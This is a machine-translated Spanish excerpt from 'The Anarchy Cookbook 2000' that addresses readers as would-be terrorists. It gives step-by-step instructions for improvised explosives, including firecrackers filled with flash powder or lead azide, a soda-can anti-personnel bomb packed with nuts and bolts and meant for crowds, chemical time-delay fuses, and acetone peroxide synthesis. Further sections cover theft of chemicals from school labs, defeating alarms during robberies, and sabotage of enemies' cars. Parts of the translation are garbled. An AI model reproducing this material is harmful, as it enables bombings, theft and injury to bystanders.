HUMO --- SIMPLE ---La siguiente reacción debe producir una buena cantidad de humo. Dado que esta reacción no es tan peligroso puede usar cantidades más grandes si es necesario

• 6 puntos. Polvo de zinc

Page 312: 106652012 the Anarchy Cookbook 2000 Es

• 1 punto. Polvo de azufre

Inserte un alambre al rojo vivo en la pila, un paso atrás.

LLAMAS DE COLORES --- ---Llamas de colores a menudo se puede utilizar como un dispositivo de señalización para los terroristas. Al poner una bola de material de combustión de color en un cohete, el cohete, cuando los fuegos de carga de expulsión, enviará una bola de color ardiente. Los materiales que producen los diferentes colores de las llamas aparecen a continuación.

COLOR MATERIAL UTILIZADO ENRojo Las sales de estroncio Bengalas [Nitrato de estroncio] Las luces de bengala rojasVerde Sales de bario Las luces de bengala verdes [Nitrato de bario]Amarillo Las sales de sodio Las luces de bengala de oro [Nitrato de sodio]Azul El cobre en polvo Las luces de bengala de color azul Centavos AntiguoColor blanco En polvo de magnesio-o- Firestarters

Aluminio Papel de aluminioPúrpura Permanganato de potasio Fuentes Purple El tratamiento de aguas residuales

213.Firecrackers por el Éxodo

Un petardo simple se puede hacer de un tubo de cartón y epoxi. Las instrucciones son a continuación:

1. Corte un pedazo pequeño de tubo de cartón del tubo que está utilizando. "Pequeño" significa cualquier cosa menos de 4 veces el diámetro del tubo.

2. Establecer la sección de tubo en un trozo de papel encerado, y rellenar con epoxi y el agente de secado a una altura de 3/4 del diámetro de la tubería. Deje que el epoxi se seque a la dureza máxima, tal como se especifica en el paquete.

3. Cuando está seco, poner un pequeño agujero en el centro del tubo, e insertar una longitud deseada de fusible.

4. Llenar el tubo con cualquier tipo de llama sensible explosivo. Flash en polvo, pyrodex, polvo negro, picrato de potasio, azida de plomo, nitrocelulosa, o cualquiera de los rápidos quema de combustible oxidante-mezclas hará muy bien. Llene el tubo casi hasta la cima.

5. Empaca los explosivos fuertemente en el tubo con un fajo de papel de seda y un lápiz o de otro modo, baqueta. Asegúrese de dejar espacio suficiente para más de epoxy.

6. Llenar el resto del tubo con la resina epoxi y endurecedor, y permitir que se seque.

7. Para aquellos que deseen hacer espectaculares fuegos artificiales, siempre use polvo de flash, mezclado con una pequeña cantidad de otro material de colores. Al triturar el material en una bengala, y agregándolo a la pólvora del flash, la explosión será del mismo color que la bengala. Mediante la adición de pequeños trozos de material espumoso, el dispositivo echar chispas de colores ardientes, del mismo color que la bengala. Mediante la adición de polvo de hierro, las chispas de color naranja se producirá. Chispas blancas pueden ser producidos a partir de virutas de magnesio, o de pequeñas bolas, ligeramente arrugado de papel de aluminio.

Ejemplo: Supongamos que quiero hacer un petardo que explota con un destello rojo, y echa chispas blancas.

Page 313: 106652012 the Anarchy Cookbook 2000 Es

En primer lugar, me gustaría tener una bengala camino, y finalmente el material en polvo en su interior. O bien, podría tomar una bengala roja, y en polvo finamente ella.

Entonces, me gustaría mezclar una pequeña cantidad de este material con el polvo de flash. NOTA: fogonazo Puede reaccionar con algunos materiales que se mezcla con el, y explotar espontáneamente! Yo lo mezclan en una proporción de 9 partes de parpadear en polvo a 1 parte de brote o material espumoso, y añadir alrededor de 15 pequeñas bolas de papel de aluminio que se almacena el material en una bolsa de plástico durante toda la noche fuera de la casa, para asegurarse de que el material no reacciona. Luego, en la mañana, me gustaría probar una pequeña cantidad de ella, y si fue satisfactorio, yo lo pondría en el petardo.

8. Si este tipo de petardo está montado en un motor de cohete, profesional para semiprofesionales pantallas pueden ser producidos.

Se dispara --- ---Una casa impresionante hecho dispararse se puede hacer fácilmente en el hogar de los motores de cohetes modelo. Motores Estes son recomendables.

1. Compre un modelo de Estes motor cohete del tamaño deseado, recordando que el poder se duplica con cada letra.

2. Cualquiera de comprar una sección del tubo del cuerpo de cohetes modelo que encaje exactamente con el motor, o hacer un tubo de varias capas de papel y pegamento.

3. Raspar el respaldo arcilla en la parte posterior del motor, de modo que el polvo está expuesta. Pegue el tubo para el motor, de modo que el tubo cubre al menos la mitad del motor. Vierta una pequeña carga de pólvora del flash en el tubo, alrededor de ½ pulgada.

4. Mediante la adición de materiales que se detallan en la sección de petardos, varios tipos de efectos se pueden producir.

5. Al poner saltos o cohetes de botella, sin el bastón en el tubo, las pantallas espectaculares con bolas de fuego en movimiento o la de MRV se puede producir.

6. Por último, mediante el montaje de muchos petardos de fabricación casera en el tubo con los fusibles en el tubo, múltiples explosiones de color se puede hacer.

--- Candelas romanas ---Candelas romanas son impresionantes de ver. Son relativamente difíciles de hacer, en comparación con los otros tipos de fuegos artificiales caseros, pero están bien vale la pena.

1. Comprar un grosor de ½ pulgada de cohetes modelo de tubo del cuerpo, y reforzarla con varias capas de papel y / o cinta adhesiva. Esto se debe hacer para evitar que el tubo de la explosión. Cortar el tubo en aproximadamente 10 pulgadas de largo.

2. Poner el tubo en una hoja de papel encerado, y sellar un extremo con epoxi y el agente de secado. Acerca de la mitad de una pulgada es suficiente.

3. Ponga un agujero en el tubo justo encima de la capa inferior de epoxi, e insertar una longitud deseada de fusible a prueba de agua. Asegúrese de que el fusible se queda apretado.

4. Verter aproximadamente 1 pulgada de pyrodex o pólvora hacia abajo el extremo abierto del tubo.

5. Hacer una bola mediante el espolvoreado de cerca de dos luces de bengala 6 pulgadas del color deseado. Mezclar este polvo con una pequeña cantidad de polvo flash y una pequeña cantidad de pyrodex, para tener una relación final (en volumen) de material espumoso 60% / 20% de polvo de flash / pyrodex 20%. Después de mezclar los polvos así, añadir agua, una gota a la vez, y mezclando continuamente, hasta obtener una pasta húmeda se forma.

Esta pasta debe ser moldeable a mano, y debe mantener su forma cuando se le deja solo. Hacer una bola de la pasta que sólo encaja en el tubo. Dejar que la bola se seque.

Page 314: 106652012 the Anarchy Cookbook 2000 Es

6. Cuando está seco, dejar caer la bola en el tubo. Se debe deslizarse con bastante facilidad. Pon un pequeño fajo de papel de seda en el tubo, y el paquete con cuidado contra la bola con un lápiz.

7. Cuando esté listo para usar, poner una vela en un agujero en el suelo, apuntando en una dirección segura, encender la mecha, y se ejecuta. Si el dispositivo funciona, una bola de fuego de color debe tirar hacia fuera del tubo a una altura de aproximadamente 30 pies. Esta altura se puede aumentar mediante la adición de una carga en polvo ligeramente más grande en el paso 4, o mediante el uso de un tubo ligeramente más largo.

8. Si la pelota no se enciende, añadir un poco más pyrodex en el paso 5.9. Las bolas hechas para las velas romanas también funcionan muy bien en cohetes,

produciendo un efecto de la caída de bolas de fuego de colores.

214. Proveedores II por el Éxodo

La mayoría, si no todos, de la información contenida en esta publicación se puede obtener a través de una biblioteca pública o universitaria. También hay muchas publicaciones que se ponen a cabo por personas que quieren ganar dinero por decirle a la gente cómo hacer explosivos en su casa. Añade a tales aparecen con frecuencia en revistas y periódicos paramilitares. Esta lista se presenta para mostrar el gran número de lugares que la información y los materiales se pueden comprar de. También incluye a las empresas de fuegos artificiales y similares.

NOMBRE Y DIRECCIÓN ¿Qué empresa VENDEFULL AUTO Co. Inc. RECETAS DE EXPLOSIVOSPO BOX 1881 DOCUMENTO DE TUBERÍANashville, TN 37133

ILIMITADO COMPUESTOS QUÍMICOS Y FUSIBLESPO BOX 1378-SN Hermiston, OR 97838

FUEGOS ARTIFICIALES DE AMÉRICA NOTICIAS FUEGOS ARTIFICIALES CON LA REVISTA NOTICIASCAJA SR 30 Fuentes y técnicasFERRY DEL Dingman, PA 18328

BARNETT, SA de CV Arcos, ballestas, MATERIALES Tiro con arco,125 Runnels CALLE Rifles de AirePO BOX 226 Port Huron, MI 48060

Crossman AIRE COMPRIMIDO Pistolas de airePO BOX 22927 ROCHESTER, NY 14692

R. Allen Profesional de la construcción FUEGOS ARTIFICIALESPO BOX 146 LIBROS Y FÓRMULASWillow Grove, Pensilvania 19090

MJ DISTRIBUCIÓN FUEGOS ARTIFICIALES FÓRMULASPO BOX 10585 Yakima, WA 98909

EJECUTIVO DE PROTECCIÓN PRODUCTS INC TEAR granadas de gas,316 California Ave. DISPOSITIVOS DE PROTECCIÓNReno, NV 89509

BADGER FUEGOS ARTIFICIALES CO INC CLASE "B" Y FUEGOS ARTIFICIALES "C" PO BOX 1451 Janesville, WI 53547

Page 315: 106652012 the Anarchy Cookbook 2000 Es

NUEVA INGLATERRA FUEGOS ARTIFICIALES CO INC CLASE "C" FUEGOS ARTIFICIALES PO BOX 3504 STAMFORD, CT 06095

ARCO IRIS DE RUTA CLASE "C" FUEGOS ARTIFICIALES PO BOX 581 Edgemont, PA 19028

STONINGTON FUEGOS ARTIFICIALES INC CLASE "C" Y FUEGOS ARTIFICIALES "B" 4010 NUEVA Wilsey BAY ROAD U.25 Rapid River, MI 49878

Windy City FUEGOS ARTIFICIALES INC CLASE "C" Y FUEGOS ARTIFICIALES "B"PO BOX 11 (Buenos precios!)ROCHESTER, EN 46975

LIBROSEl manual del anarquista (Altamente distribuido)EL MANUAL DE MUNICIONES DE IMPROVISACIÓN (Fórmulas de trabajo, pero el fabricante puso en riesgo)

EXPLOSIVOS MILITARESDos manuales de interés: Dupont "Blaster" Manual, manual de $ 20 se utiliza principalmente para operaciones de rock y sismográficas. Atlas "en polvo manual" o "Manual de la voladura de rocas" (no recuerdo el título, es en la oficina). Este es un libro de 60 dólares, vale la pena el dinero en efectivo, que trata de estos dos temas, además de demoliciones y voladuras no cantera.

215.Checklist de redadas en los laboratorios por el Éxodo

Al final, el terrorista serio probablemente se darían cuenta de que si él / ella desea hacer un explosivo realmente útil, él o ella tendrá que robar los productos químicos para hacer el explosivo de un laboratorio. Una lista de esos productos químicos en orden de prioridad, probablemente se parecería a lo siguiente:

LÍQUIDOS SÓLIDOS ____ Ácido nítrico ____ perclorato de potasio ____ ____ Ácido sulfúrico Clorato de Potasio ____ Etanol 95% ____ pícrico ácido (generalmente un polvo) ____ ____ Tolueno Nitrato de Amonio ____ ____ Ácido perclórico en polvo de magnesio ____ ____ Acido Clorhídrico en polvo de aluminio ____ Permanganato de potasio GASES ____ De azufre (flores de) ____ Hidrógeno ____ Mercurio ____ Oxígeno nitrato de potasio ____ ____ ____ Cloro Hidróxido de potasio ____ ____ Dióxido de carbono fósforo ____ Azida sódica ____ Acetato de plomo ____ Nitrato de bario

Imprimir esta hoja hacia fuera y lo lleva con usted! Memorizar es, cualquier cosa. Se trata de un valor incalculable. Todos estos productos químicos debe realizarse en el laboratorio de la escuela. Feliz caza. :)

Page 316: 106652012 the Anarchy Cookbook 2000 Es

216.Misc anarquía por el Éxodo

Cañones de pelotas de tenis y otra información de Usenet. El Usenet es una red mundial de 15.000 máquinas y más de 500.000 personas-y creciendo!

En este momento (doce años) la mayoría de las latas de refrescos eran de estaño enrollada en lugar del aluminio moldeado. Queremos cortar los extremos superiores e inferiores de un montón de ellos y pegarlas con cinta adhesiva, formando un tubo de dos metros o más.

Al final se haría una cinta. Puede con la parte inferior intacto, más agujeros perforados (con un abrelatas) alrededor de la parte superior, y un pequeño orificio en el lado en la base A continuación, fijar este artilugio en un trípode para poder apuntar de forma fiable. Cualquier objeto que llegó algo cerca de llenar el tubo se colocó a continuación en el mismo.

En la tienda, se utilizó el reloj como un objetivo y un carrete de soldadura de plástico vacía de munición, con cinta adhesiva en los extremos del agujero del centro y, a veces llena de arandelas para el peso. Cuando se toma a fiestas o días de campo, se utilizaría lo que fuera útil. Rollos de perros calientes o compresas rellenas con papas fritas siempre y entretenimiento espectacular. Una vez cargado, una pequeña cantidad de un líquido más ligero se vertió en el agujero en el lado del extremo puede y se dejó evaporar durante unos momentos. El "técnico de control de incendios" anunciaría "Fire in the Hole" y encenderlo. BOOM! ¡Zas! El reloj nunca funcionó después de eso!

Nuestra versión del cañón de patatas fritas, originalmente diseñado en torno a la patata frita lata de Pringles, fue construido de manera similar. Nuestro utilizar latas de coque, seis con la parte superior e inferior eliminado, y el séptimo tenía agujeros abrebotellas en todo un extremo, la parte superior de esta lata fue cubierto con una rejilla o un pedazo de tela metálica para mantener la pelota de tenis que se caiga todo el camino a la parte inferior. Esto fue envuelto en espiral con al menos dos rollos de cinta adhesiva.

Un descanso de hombro de madera y empuñadura hacia adelante fue grabado en el tubo. Para la ignición que utiliza baterías de linterna a una bobina Modelo-T, accionado por un botón en el mango. Una nueva pelota de tenis Wilson se metió todo el camino de regreso a la parrilla, y una o dos gotas de un líquido más ligero se cayó en uno de los dos agujeros en el extremo. El cable de encendido se asomó a través del otro agujero. A continuación, se encuentran al acecho, esperando a que algo se mueva. Cuando se dispara con la adecuada mezcla aire / combustible, un thoomp satisfactorio! A una distancia máxima de la pelota viajaba a unos 100 metros con un ángulo de lanzamiento 45 °. Más cerca de la pelota dejaría una roncha en un oponente en guerra. Cuando se puso en marcha en un automóvil en movimiento el ruido al golpear la puerta generalmente sacudir a nadie en su interior. Por suerte no hemos completado el que dispararon pelotas de golf.

Más cosas de la diversión para los terroristasCarburo de bomba

Esto es extremadamente peligroso. Tenga mucho cuidado .... Obtener algunos de carburo de calcio. Este es el material que se utiliza en las lámparas de carburo y se puede encontrar en casi cualquier ferretería.

Tomar unas pocas piezas de este material (se parece a la grava) y lo puso en un frasco de vidrio con un poco de agua. Ponga una tapa bien apretada. El carburo reaccionará con el agua para producir carbonato de acetileno que es similar a la del gas utilizado en los sopletes de corte.

Page 317: 106652012 the Anarchy Cookbook 2000 Es

Finalmente, el vidrio con explotar de presión interna. Si dejas un trapo quemado cerca, usted recibirá un hermoso meteorito!

Escape de los automóviles Flame ThrowerPara éste, todo lo que necesitas es un coche, una bujía, cables de encendido y un interruptor. Instale la bujía en los últimos cuatro o cinco centímetros del tubo de escape mediante la perforación de un agujero que el enchufe puede atornillar en fácilmente. Una el cable (este es el alambre aislado ordinario) a un lado del interruptor y la bujía. El otro lado del interruptor está conectado al terminal positivo de la batería. Con el coche en marcha, simplemente pulsa el interruptor y ver las llamas vuelan! Una vez más tener cuidado de que no hay nadie detrás de ti! He visto algunas de estas llamas van de 20 pies!

GlobosLos globos son divertidos para jugar en el laboratorio de química, los llenan con el gas que usted sale de los grifos en las mesas de laboratorio, y luego atar el balón ajustado, y dejarlo caer por la ventana a los quemados a continuación, usted sabe, las que siempre están fumando, les encanta explotar los globos con el cigarrillo encendido .... obtener la imagen? Buena.

Bloquea 217.Combo II por el Éxodo

En primer lugar, déjenme decirles acerca de la puesta en marcha de una cerradura. Cuando el bloqueo está bloqueado, hay una pieza curva de metal encajada dentro de la muesca pequeña en la barra en forma de herradura (conocido como el grillete) que es empujado en la cerradura cuando lo bloquee.

Para liberar esta cuña, normalmente tienes que activar el bloqueo de la combinación deseada y la presión en la cuña se libera por lo tanto, dejar que el candado abierto. Ahora voy a decirte cómo hacer una selección para que pueda abrir una cerradura sin tener que perder todo ese tiempo, convirtiendo la combinación (esto también ayuda cuando usted no sabe la combinación para empezar).

Para evitar este problema, simplemente tomar una horquilla diluido (presentar hacia abajo) o una pieza abierto de una antena de colapso (el diámetro interior de la pieza curvada de metal debe ser el mismo que el diámetro del grillete-si el metal es demasiado de espesor, utilice papel de lija fino para adelgazar.

Una vez que tenga su horquilla (asegúrese de que es de metal), tome el lado estriado y romper la derecha antes de que comience a hacer una vuelta en U en el lado derecho. La parte curvada ahora se puede utilizar como un mango. Ahora, usando una lima, limar el otro extremo hasta que es bastante delgado. Usted debe hacer esto con muchas horquillas y presentarlos para que sean de diferentes espesores para poder cerraduras jimmy diversos.

Mira una cerradura para ver de qué lado de la cerradura se abre. Si usted no puede decir, sólo tendrá que tratar de ambos lados. Cuando ya saber de qué lado se abre a partir de tomar el bloqueo de selección y se adhieren al final presentado en el interior de la barra en forma de herradura en cualquier lado de la cerradura se abre.

Ahora, ponga presión sobre el mango de la ganzúa (empujando hacia abajo, dentro de la grieta) y tire de la cerradura de arriba y abajo. La cerradura se abrirá porque la selección separada de la cuña y la muesca que permite que se abra.

Además, esta técnica funciona mejor en las cerraduras de América. Nunca he elegido un maestro de bloqueo antes debido a la forma de una presión de la cuña, pero si alguien lo hace, que me haga saber cuánto tiempo le llevó. Además, la carcasa de Master Lock es muy riguroso de tal forma ya no puede conseguir la cuña pulgadas

Page 318: 106652012 the Anarchy Cookbook 2000 Es

218.Misc anarquía II por Rocker Ragner

Muchos de ustedes probablemente tienen fantasías de venganza en contra de los maestros, directores y otras personas que son tan pendejos. Dependiendo de su nivel de odio de esa persona yo le aconsejaría que lo haga algunos de estos experimentos siguientes:

1. Verter dishsoap en el tanque de gasolina de tu enemigo - que muchos de ustedes ya saben que la gasolina + dishsoap (por ejemplo, la alegría, Palmolive, etc) forman una mezcla llamada napalm. Ahora el napalm es una sustancia gelatinosa utilizada en las bombas, lanzallamas, etc Ahora sólo se puede adivinar lo que esta mezcla se hace a la línea de combustible de alguien!!

2. Difusión de motor sucio de aceite / aceite de ricino en el tubo de escape de una persona - cuando el tubo de escape se calienta (¡y lo hará) el aceite de motor o aceite de ricino en la tubería será producir un espeso humo desagradable a supurar adelante de la parte de atrás de ese coche. Quién sabe, tal vez él / ella puede ser detenido y dado un billete!

3. Bomba Bombilla

4. Simple humo / olor bomba - usted puede comprar en una farmacia de azufre en las flores de nombres de azufre. Ahora, cuando el azufre se quema se desprenden un olor muy fuerte y un montón de humo. Ahora todo lo que necesita es un fusible de un petardo, una lata, y el azufre. Llene la lata con el azufre (paquete muy a la ligera), ponga papel de aluminio sobre la parte superior de la lata, hacer un agujero pequeño en el papel, inserte la mecha, y que la luz y salir de la habitación si el valor de sus pulmones. Usted puede encontrar muchos usos para esta o al menos eso espero.

DIVERSIÓN CON ALARMAS

Un hecho me olvidé de mencionar en mis artículos anteriores de alarma es que también se puede usar espuma de poliuretano en una lata para silenciar los cuernos y campanas. Usted puede comprar en cualquier tienda de hardware como de aislamiento. Es fácil de manejar y más rápido se seca.

Muchas personas que viajan a llevar a una alarma de bolsillo con ellos. Esta alarma es un pequeño dispositivo que se cuelga alrededor de la perilla de la puerta, y cuando alguien toca la perilla de la capacidad del cuerpo pone en marcha la alarma. Estas molestias desagradables se puede encontrar caminando por los pasillos de un hotel y tocar todas las perillas de las puertas con gran rapidez. si le sucede al azar a uno, adjunte una longitud de 3 'de alambre u otro objeto metálico a la perilla. Esto hará que el cerdo de negocios para dormir en el interior de pensar que alguien se está rompiendo y llamar a servicio a la habitación en busca de ayuda. Todo tipo de diversión y los juegos se producirán.

Algunas instalaciones de alta seguridad utilizan teclados al igual que las almohadillas de marcación por tonos (una marca registrada de los sistemas de campana) para abrir cerraduras o desarmar las alarmas. La mayoría utilizan tres o cuatro dígitos. Para averiguar el código, limpie el teclado numérico libre de todas las huellas dactilares mediante el uso de un trapo empapado en alcohol. Después de que el teclado se ha utilizado solo se aplica el polvo de huellas dactilares y los cuatro dígitos se marcará. ahora todo lo que tienes que hacer es averiguar el orden. Si quieres pasar un buen rato con un teclado, intente presionar el * y # al mismo tiempo. Muchas unidades de usar esto como un botón de pánico. Esto hará que el propietario y los policías corriendo y cada vez se tendrá un buen momento. No trate de retirar estos paneles de la pared, ya que tienen incorporados en los conmutadores de sabotaje. Sobre el tema de atracos, la mayoría de los lugares (como supermercados, licorerías, etc) tienen lo que se conoce como un clip de dinero. Estos desagradables pequeños se colocan en el fondo de un cajón de dinero y cuando los billetes últimos son con tirado por un interruptor se cierra y fija la alarma. Es por eso que cuando usted hace su retiro lo mejor es ayudarse a sí mismo para que pueda consultar por estos desagradables

Page 319: 106652012 the Anarchy Cookbook 2000 Es

pequeños. Si los encuentras, simplemente introduzca las por debajo de la pila de veinte años, y luego tire de los años veinte, dejando el billete de un dólar por detrás para evitar que el circuito se cierre.

Lata de refresco BOMBUN ARTÍCULO DEL LIBRO:

EL POBRE DE JAMES BOND POR KURT SAXONEsto es una bomba anti-personal destinado a las multitudes de fresado. La parte inferior de una lata de refresco es la mitad cortada y doblada hacia atrás. Un cohete gigante u otro explosivo se coloca en y rodeado de tuercas y tornillos o piedras. El fusible está entonces armado con un retardo de producto químico en una pajita de plástico.

Después de la primera asegurándose de que no hay niños cerca, el ácido o la glicerina se pone en la paja y la lata se sentó junto a un árbol o una pared en la que no se vuelque. El retraso le debe dar de tres a cinco minutos. A continuación, tendrá un efecto destructor sobre los transeúntes.

Es muy poco probable que alguien pueda recoger y beber de bebida de alguien más suave posible. pero si una persona tan cruda debe tratar de beber de su bomba que rompía el ayuno mala costumbre!

! ! ! ! ! ! <-QUÍMICAS INGITER -------- ! ! 1! ! ! =====! ! *! ! "! ! ! ! ! ! ! ! <- GRAN PETARDO ! ! !%! ! ! ==== ! ! ! #! ! ---! ! ! ! <- Nuts & Bolts ! /! ! ! ---------

Pyro Libro IIpor el Capitán Hack y lobo gris

Tiempo de demora FUSE QUÍMICA1. Ponga una cucharadita de permanganato de potasio en una lata.2. Añadir unas gotas de glicerina.3. Esperar 3-4 min.4. Vete al infierno. Las cosas se fuma, entonces estalló en llamas.

Manchas de permanganato de potasio como el yodo, pero peor es púrpura []. La reacción salpicaduras un poco lo que puede ser desordenado y no importa si las cantidades son desiguales [es decir, 1 parte a 3 partes]

EXPLOSIVOS Y incendiarios por el investigador

INTRODUCCIÓN:El problema con los libros de texto de química y explosivos es la actitud con que se escriben. Ellos no dicen: "Ahora sé que le gustaría hacer estallar el infierno santa de algo sólo por el gusto de hacerlo asi que aquí es la forma de preparar algo en su cocina para hacerlo". Te dicen cómo Dupont que hace o cómo los antiguos chinos lo hizo pero no se cómo se puede hacer con los recursos y materiales disponibles para usted.

Page 320: 106652012 the Anarchy Cookbook 2000 Es

Incluso los manuales del ejército en materia de explosivos sobre el terreno convenientes son casi inútiles, ya que simplemente explican por escrito en el entendimiento de que un profesor se va a llenar los espacios en blanco. Se trata de un divertido juego para buscar los materiales que se pueden juntar para hacer algo que vaya "boom". Usted puede encontrar lo que necesitas en tiendas de abarrotes, ferreterías y suministros agrícolas. Un punto interesante a tener en cuenta es que es mucho más fácil hacer una explosión e mas grande que uno pequeño. Es muy difícil para un experimentador casa para hacer un petardo, pero una bomba capaz de soplar las paredes de un edificio es fácil.

CÓMO HACER Rocket FuelEsto es fácil de hacer y divertido para jugar. Mezclar a partes iguales por volumen o de potasio nitrato de sodio y el azúcar granulada. Vierta una cucharada grande de este en un montón. Pegue un pedazo de mecha blackmatch en ella, la luz, y dar un paso atrás. Esta es también una incendiaria muy caliente. Un poco de imaginación se sugieren una serie de experimentos para esto.

OTRO Rocket FuelMezcle partes iguales en volumen de polvo de zinc y azufre. Tenga cuidado si usted experimentar con esto. Se apaga en un repentino destello. No es un potente explosivo, pero es algo violento, incluso cuando no se limitan debido a su velocidad de combustión rápida.

Al continuar desde este punto algunos de los ingredientes van a ser más difícil de conseguir sin tener que pasar a través de un suministro de productos químicos. Trato de evitar esto. Me he enterado de que B. Prieser Científicas (hora local de mi zona) ha sido instruido por la policía para enviar los nombres de las personas que compran los productos químicos en ciertas combinaciones. Por ejemplo, si una persona fuera a comprar ácido sulfúrico, ácido nítrico y tolueno (los ingredientes para TNT) en un solo pedido de la policía será notificada. Haré lo mejor que puedo decirte cómo hacer las cosas que necesita a partir de materiales comúnmente disponibles, pero no quiero dejar de lado algo muy bueno porque puede que tenga que mendigar para un ingrediente. Creo que te prefiere de esa manera.

CÓMO HACER UNA EXPLOSIVA DE PARTIDOS COMUNESApriete la cabeza cerca de la parte inferior con un par de alicates para romperlo; a continuación, utilizar los bordes de las cuchillas para quitar el material suelto. Se pone fácil con la práctica. Usted puede hacer esto mientras ve la televisión y reunir lo suficiente para una bomba sin morir de aburrimiento.

Una vez que tengas una buena tanda de él, usted puede cargar en una tubería en lugar de polvo negro. Tenga cuidado de no conseguir ninguna de las roscas, y limpie la que recibe en el extremo de la tubería. No trate de utilizar este material para combustible de cohetes. Un maestro de la ciencia fue asesinado de esa manera.

Sólo por diversión, mientras yo estoy en el tema de los partidos, ¿sabía usted que usted puede encender una cerilla de seguridad en un cristal de la ventana? Sostenga un cerillo de papel entre el pulgar y el dedo índice. Con el dedo medio, presione firmemente la cabeza contra una ventana de gran tamaño. Muy pronto, frotar el partido por el panel de aproximadamente 2 pies, mientras se mantiene la presión. La fricción genera calor suficiente para encender la mecha.

Otro truco divertido es el cohete partido. Enrolle la mitad superior de un partido de papel con papel de aluminio. Establecer en la parte superior de una botella de gaseosa en un ángulo de 45 °. Mantenga una cerilla encendida en la cabeza hasta que se enciende. Si lo ha hecho bien, el partido que pasean arriba y golpear el techo.

Acabo de recordar que las armas del partido que solía hacer cuando era un niño. Estos están hechos de una bicicleta habló. En un extremo del radio es una pieza que los tornillos de descanso. Take it off y atornillar al revés. Ahora tiene un pedazo de alambre rígido con un pequeño tubo hueco en un extremo. Guarde el material de un par de fósforos de seguridad de madera en el tubo. Forzar el tallo de un partido en el

Page 321: 106652012 the Anarchy Cookbook 2000 Es

agujero. Debe quedar bien ajustado. Mantenga una cerilla encendida en el tubo hasta que se caliente lo suficiente como para encender la pólvora. Se va con una explosión.

CÓMO HACER ácido sulfúrico concentrado ácido de la bateríaIr a una tienda de auto y pedir "un ácido de la batería pequeña". Esto sólo debería costar unos pocos dólares. Lo que se obtiene es de un galón de ácido sulfúrico diluido. Ponga un litro de este en un recipiente de vidrio resistente al calor. Las jarras de vidrio utilizadas para hacer el café son perfectos. No use un recipiente de metal.

Utilice un cable de extensión para establecer una zona de cocción a las puertas. Hervir el ácido hasta que aparezcan humos blancos. Tan pronto como se ven los humos blancos, apague la placa caliente y dejar que el ácido fresco. Verter el ácido ahora concentrado en un recipiente de vidrio. El contenedor debe tener un tapón de vidrio o de la tapa de plástico - no metal. Debe ser hermético. De lo contrario, el ácido rápidamente absorben la humedad del aire y convertirse diluida. ¿Quieres saber cómo hacer una bomba de tiempo que no marque y no tiene cables ni pilas? Espera a su ácido y que me siga en la próxima entrega.

CÓMO HACER UN TIEMPO QUÍMICA fusible de retardo:Para tener una comprensión de cómo se va a trabajar, se mezcla a partes iguales por el clorato de potasio y el volumen de azúcar granulada. Verter una cucharada de la mezcla en una pila pequeña y crea una depresión en la parte superior con el extremo de una cuchara. El uso de un gotero, coloque una gota de ácido sulfúrico concentrado en la depresión y el paso atrás.

Se réplicas, el chisporroteo un par de veces y luego estalló en llamas vigorosas. Para hacer que el fusible, corte alrededor de 2 pulgadas de una pajita de plástico. Comprimir un pequeño trozo de algodón en un extremo. En la parte superior de esta opción de venta alrededor de una pulgada de la mezcla de clorate / azúcar.

Ahora la ligera apisonar en alrededor de un cuarto de pulgada de lana de vidrio o de cualquiera de las fibras de amianto. Asegurar esto con el extremo abierto y vuelta en 3 o 4 gotas de ácido sulfúrico. Después de unos minutos el ácido se absorberá a través de las fibras y encender la mezcla.

El retardo de tiempo puede ser controlado por la cantidad de fibra utilizada y variando la fuerza con que está lleno. No utilizar algodón para ello. El ácido reacciona con el algodón y se debilitan en el proceso. Perforando un agujero en el lado de la paja, un pedazo de blackmatch o el fusible otra se pueden insertar y utilizar para hacer estallar el dispositivo de su elección.

El clorato de potasio era muy popular con el metro radical. Se puede utilizar para hacer una amplia variedad de explosivos e incendiarios, algunos de ellos extremadamente peligroso de manejar. Los radicales perdieron varias personas de esa manera. Pero, no te preocupes. Yo no voy a tratar de protegerlo de sí mismo. Me he decidido a contarlo todo. Tendré más que decir acerca de clorato de potasio, pero por ahora, echemos un vistazo a un par de interesantes fusibles eléctricos.

PEROXYACETONEPEROXYACETONE es extremadamente inflamable y se ha informado a SER sensibles a los golpes

MATERIALES:• 4 ml de acetona• 4 ml de hidrógeno 30% de peróxido• 4 gotas Conc. Ácido clorhídrico• 150 mm tubo de ensayo

Añadir 4 ml de acetona y 4 ml de peróxido de hidrógeno al tubo de ensayo. A continuación, añadir 4 gotas de ácido clorhídrico concentrado. En 10-20 minutos de un sólido blanco que comienzan a aparecer. Si no se observa cambio, calentar el tubo de ensayo en un baño de agua a 40 ° C. Dejar que la reacción continúe durante dos horas.

Page 322: 106652012 the Anarchy Cookbook 2000 Es

Agitar la mezcla y filtrar. Deja a cabo sobre papel de filtro para secar por lo menos dos horas. Para encender, encender una vela atada a un palo de un metro y que la luz (durante su estancia al menos un metro de distancia).

Me gustaría dar crédito a un libro titulado "Las manifestaciones shakashari química" para algunas de las cantidades exactas de sustancias químicas en algunos experimentos.

EL RINCÓN DEL QUÍMICO N º 2:Productos químicos domésticos, POR Zaphod Beeblebrox / MPG

En este artículo se refiere a las instrucciones de cómo hacer algunos experimentos interesantes con los productos químicos comunes en el hogar. Algunos pueden o no funcionar dependiendo de la concentración de ciertas sustancias químicas en las diferentes áreas y marcas. Yo diría que la persona que realiza estos experimentos tienen un cierto conocimiento de la química, especialmente para los experimentos más peligrosos.

Yo no soy responsable por cualquier lesión o daño causado por las personas que usan esta información. Para ello está previsto su uso por personas con conocimientos en química que están interesados en tales experimentos, y puede manejar con seguridad estos experimentos.

I. LISTA DE PRODUCTOS QUÍMICOS DEL HOGAR y su composición

VINAGRE: 3-5% de ácido acético BICARBONATO ÁCIDO: BICARBONATO DE SODIOLimpiadores de drenaje: Hidróxido de sodio SANI-RAS: 75% bisulfato de sodioAgua amoniacal: hidróxido de amonio CÍTRICOS: Acido CítricoSal de mesa: AZÚCAR DE SODIO CLORURO: SACAROSALeche de Magnesia: TINTURA DE MAGNESIO HIDROXIDO DE YODO: 4% de yodoEl alcohol: 70% o 99% (depende de la marca) Alcohol isopropílico (NO BEBER!)

GENERACIÓN DE GAS CLOROEsta cifra es ligeramente más peligroso que los otros dos experimentos, así que usted debe saber lo que estás haciendo antes de probar esto ...

